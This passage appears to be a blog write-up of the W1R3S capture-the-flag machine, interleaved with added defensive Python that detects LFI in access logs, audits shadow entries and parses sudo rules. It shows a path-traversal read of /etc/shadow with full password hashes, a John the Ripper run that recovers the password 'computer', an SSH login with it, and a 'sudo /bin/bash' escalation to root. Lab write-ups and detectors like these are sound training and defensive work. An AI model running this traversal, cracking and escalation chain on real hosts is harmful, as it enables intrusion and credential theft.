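    ' HTTP/1.1" 200 3102 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [17/Jan/2023:19:23:00 +0800] "GET /wordpress/wp-login.php HTTP/1.1" 200 1520 "-" "Mozilla/5.0"',
]


def find_lfi_attempts(lines):
    """Return one record per request whose (decoded) target matches an LFI indicator."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        # Decode twice so double-encoded payloads (%252e%252e%252f) are caught too.
        decoded = unquote(unquote(m.group("target")))
        matched = [name for name, rx in INDICATORS if rx.search(decoded)]
        if matched:
            hits.append({"ip": m.group("ip"), "method": m.group("method"),
                         "target": m.group("target"), "status": int(m.group("status")),
                         "indicators": matched})
    return hits


if __name__ == "__main__":
    for hit in find_lfi_attempts(SAMPLE_LOG):
        print(hit["ip"], hit["method"], hit["status"], hit["indicators"])
    print(resolve_include("/var/www/cuppa/alerts", "../../../../etc/passwd"))
```

Note the second sample line: the curl --data-urlencode request is a POST, so the payload travels in the body and the access log records only the URL. Detecting that variant needs the application's own logging or a reverse proxy or WAF that records request bodies; the access-log check alone only catches the GET form.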

Now we test whether /etc/shadow, which stores the account password hashes, can be read the same way.

It works:

<style>
    .new_content{
        position: fixed;
    }
    .alert_config_field{
        font-size:12px;
        background:#FFF;
        position:relative;
        border-radius: 3px;
        box-shadow: 0px 0px 5px rgba(0,0,0,0.2);
        overflow:hidden;
        position:fixed;
        top:50%;
        left:50%;
        width:600px;
        height:440px;
        margin-left:-300px;
        margin-top:-220px;
    }
    .alert_config_top{
        position: relative;
        margin: 2px;
        margin-bottom: 0px;
        border: 1px solid #D2D2D2;
        background: #4489F8;
        overflow: auto;
        color:#FFF;
        font-size: 13px;
        padding: 7px 5px;
        box-shadow: 0 0 2px rgba(0, 0, 0, 0.1);
        text-shadow: 0 1px 1px rgba(0, 0, 0, 0.2);
    }
    .description_alert{
        position:relative;
        font-size:12px;
        text-shadow:0 1px #FFFFFF;
        font-weight: normal;
        padding: 5px 0px 5px 0px;
    }
    .btnClose_alert{
        position:absolute;
        top: 4px; right: 2px;
        width:22px;
        height:22px;
        cursor:pointer;
        background:url(js/cuppa/cuppa_images/close_white.png) no-repeat;
        background-position: center;
        background-size: 13px;
    }
    .content_alert_config{
        position:relative;
        clear:both;
        margin: 2px;
        margin-top: 0px;
        height: 401px;
        padding: 10px;
        overflow: auto;
    }
</style>
<script>
        function CloseDefaultAlert(){
                cuppa.setContent({'load':false, duration:0.2});
        cuppa.blockade({'load':false, duration:0.2, delay:0.1});
        }
</script>
<div class="alert_config_field" id="alert">
    <div class="alert_config_top">
        <strong>Configuration</strong>:         <div class="btnClose_alert" id="btnClose_alert" onclick="CloseDefaultAlert()"></div>
    </div>
    <div id="content_alert_config" class="content_alert_config">
        root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::
daemon:*:17379:0:99999:7:::
bin:*:17379:0:99999:7:::
sys:*:17379:0:99999:7:::
sync:*:17379:0:99999:7:::
games:*:17379:0:99999:7:::
man:*:17379:0:99999:7:::
lp:*:17379:0:99999:7:::
mail:*:17379:0:99999:7:::
news:*:17379:0:99999:7:::
uucp:*:17379:0:99999:7:::
proxy:*:17379:0:99999:7:::
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
backup:*:17379:0:99999:7:::
list:*:17379:0:99999:7:::
irc:*:17379:0:99999:7:::
gnats:*:17379:0:99999:7:::
nobody:*:17379:0:99999:7:::
systemd-timesync:*:17379:0:99999:7:::
systemd-network:*:17379:0:99999:7:::
systemd-resolve:*:17379:0:99999:7:::
systemd-bus-proxy:*:17379:0:99999:7:::
syslog:*:17379:0:99999:7:::
_apt:*:17379:0:99999:7:::
messagebus:*:17379:0:99999:7:::
uuidd:*:17379:0:99999:7:::
lightdm:*:17379:0:99999:7:::
whoopsie:*:17379:0:99999:7:::
avahi-autoipd:*:17379:0:99999:7:::
avahi:*:17379:0:99999:7:::
dnsmasq:*:17379:0:99999:7:::
colord:*:17379:0:99999:7:::
speech-dispatcher:!:17379:0:99999:7:::
hplip:*:17379:0:99999:7:::
kernoops:*:17379:0:99999:7:::
pulse:*:17379:0:99999:7:::
rtkit:*:17379:0:99999:7:::
saned:*:17379:0:99999:7:::
usbmux:*:17379:0:99999:7:::
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
sshd:*:17554:0:99999:7:::
ftp:*:17554:0:99999:7:::
mysql:!:17554:0:99999:7:::
    </div>
</div>

Then we crack the two hashes:

www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
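Before cracking, a defender would want to know what those shadow lines already say. As an added example that is not part of the original post, the Python below parses the /etc/shadow and /etc/passwd lines read above (hash strings copied from the page, accounts trimmed to a few) and reports which accounts carry a usable hash, which service account has a password it should not have, and whether passwords ever expire.

```python
from datetime import date, timedelta

# Constructed excerpt of the /etc/passwd and /etc/shadow contents read from the
# target on this page (hash strings copied from the page; other accounts omitted).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
w1r3s:x:1000:1000:w1r3s,,,:/home/w1r3s:/bin/bash
mysql:x:123:130:MySQL Server,,,:/nonexistent:/bin/false
"""

SAMPLE_SHADOW = """\
root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::
daemon:*:17379:0:99999:7:::
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
speech-dispatcher:!:17379:0:99999:7:::
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
mysql:!:17554:0:99999:7:::
"""

# crypt(3) "$id$" prefixes and the algorithm they denote
CRYPT_IDS = {"1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
             "5": "sha256crypt", "6": "sha512crypt", "y": "yescrypt"}

EPOCH = date(1970, 1, 1)          # shadow dates are days since this
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}


def classify_hash(field: str) -> str:
    """'locked' for * or a leading ! (no usable password), 'empty' for no password
    at all, otherwise the crypt(3) algorithm name taken from the $id$ prefix."""
    if field == "*" or field.startswith("!"):
        return "locked"
    if field == "":
        return "empty"
    if field.startswith("$"):
        return CRYPT_IDS.get(field.split("$")[1], "unknown-crypt")
    return "legacy-des"


def parse_shadow(text: str):
    """Map user -> {hash_type, last_change (date), max_age_days} from shadow lines."""
    entries = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        user, pw, lastchg, _minage, maxage, _warn = line.split(":")[:6]
        entries[user] = {
            "hash_type": classify_hash(pw),
            "last_change": EPOCH + timedelta(days=int(lastchg)) if lastchg else None,
            "max_age_days": int(maxage) if maxage else None,
        }
    return entries


def parse_shells(text: str):
    """Map user -> login shell from passwd lines (field 7)."""
    return {line.split(":")[0]: line.split(":")[6] for line in text.splitlines() if line.strip()}


def audit(shadow_text: str, passwd_text: str):
    """Findings a defender acts on: accounts with a crackable hash, service accounts
    that should be locked but carry a password, and passwords that never expire."""
    shadow, shells = parse_shadow(shadow_text), parse_shells(passwd_text)
    findings = []
    for user, e in shadow.items():
        if e["hash_type"] == "locked":
            continue
        if e["hash_type"] == "empty":
            findings.append((user, "empty password"))
            continue
        findings.append((user, f"usable {e['hash_type']} hash, last set {e['last_change']}"))
        if shells.get(user) in NOLOGIN_SHELLS:
            findings.append((user, "service account has a password set; lock it (passwd -l)"))
        if e["max_age_days"] == 99999:
            findings.append((user, "password never expires"))
    return findings


if __name__ == "__main__":
    for user, msg in audit(SAMPLE_SHADOW, SAMPLE_PASSWD):
        print(f"{user}: {msg}")
```

The www-data finding is the interesting one: a web server account normally has a locked password field (* or !); a sha512crypt hash on it means someone set a password, which is exactly what lets john recover it in the next step.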

0x06 Cracking with John

john hash

hash is the file holding the two lines above; john uses its default wordlist

Result:

Warning: detected hash type "sha512crypt", but the string is also recognized as "HMAC-SHA256"
Use the "--format=HMAC-SHA256" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
www-data (www-data)
Warning: Only 6 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 1 candidate buffered for the current salt, minimum 8 needed for performance.
Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Warning: Only 6 candidates buffered for the current salt, minimum 8 needed for performance.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
computer (w1r3s)
2g 0:00:00:01 DONE 2/3 (2023-01-17 19:40) 1.149g/s 1759p/s 1760c/s 1760C/s 123456..john
Use the "--show" option to display all of the cracked passwords reliably

www-data (www-data)

computer (w1r3s)

Try these credentials over SSH.

0x07 Initial access

ssh w1r3s@192.168.63.132

Password: computer

Login succeeds.

Check privileges:

whoami
uname -a   # kernel and system information
sudo -l    # list the commands the current user may run with sudo

Result:

w1r3s@W1R3S:~$ sudo -l
[sudo] password for w1r3s:
Matching Defaults entries for w1r3s on W1R3S.localdomain:

env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User w1r3s may run the following commands on W1R3S.localdomain:

(ALL : ALL) ALL
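The rule (ALL : ALL) ALL is the broadest sudo grant possible. As an added example that is not part of the original post, the Python below parses sudo -l output into rules and rates them; SUDO_L_FULL is the output shown above, and SUDO_L_LIMITED is a hypothetical, more restricted user added to show how NOPASSWD tags and command lists are represented.

```python
import re

# sudo -l output as shown on the page for w1r3s (raw string: the \: in secure_path is literal).
SUDO_L_FULL = r"""Matching Defaults entries for w1r3s on W1R3S.localdomain:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User w1r3s may run the following commands on W1R3S.localdomain:
    (ALL : ALL) ALL
"""

# Hypothetical output for a more restricted user, constructed for this example.
SUDO_L_LIMITED = """\
User backupop may run the following commands on W1R3S.localdomain:
    (root) NOPASSWD: /usr/bin/rsync
    (root) /usr/sbin/service apache2 restart, /usr/sbin/service apache2 status
"""

# One rule line: "(runas) TAG: TAG: cmd1, cmd2"
RULE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(output: str):
    """Parse the command-rule lines of `sudo -l` into dicts; Defaults lines are skipped."""
    rules = []
    in_rules = False
    for line in output.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE.match(line)
        if m:
            rules.append({
                "runas": m.group("runas").strip(),
                "tags": [t.rstrip(":") for t in m.group("tags").split()],
                "commands": [c.strip() for c in m.group("cmds").split(",")],
            })
    return rules


def audit_sudo(rules):
    """Rate each rule: ALL as any user is root-equivalent; NOPASSWD removes the
    password check between a stolen session and the listed commands."""
    findings = []
    for r in rules:
        if "ALL" in r["commands"]:
            findings.append(("critical", f"({r['runas']}) ALL: any command as any user, e.g. sudo /bin/bash"))
        if "NOPASSWD" in r["tags"]:
            findings.append(("high", f"NOPASSWD on {', '.join(r['commands'])}: no password prompt"))
    return findings


if __name__ == "__main__":
    for sample in (SUDO_L_FULL, SUDO_L_LIMITED):
        for severity, msg in audit_sudo(parse_sudo_l(sample)):
            print(f"[{severity}] {msg}")
```

On a real host the same parser can be run on the output of sudo -l for every interactive user, and any critical finding outside the administrators' group is something to fix in /etc/sudoers rather than to explain away.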

So the user may run any command with sudo.

0x08 sudo privilege escalation

sudo /bin/bash

Root obtained.

Go to root's home directory and read the flag.


0x09 Summary

  • Do information gathering thoroughly
  • Do not spend too long on any single phase
  • Attack from different angles
  • Encoding and request-method issues can affect results


Copyright: Jtripper. Please credit the source when reposting.

Article link: https://www.jtripperbacaf.com/index.php/archives/59/
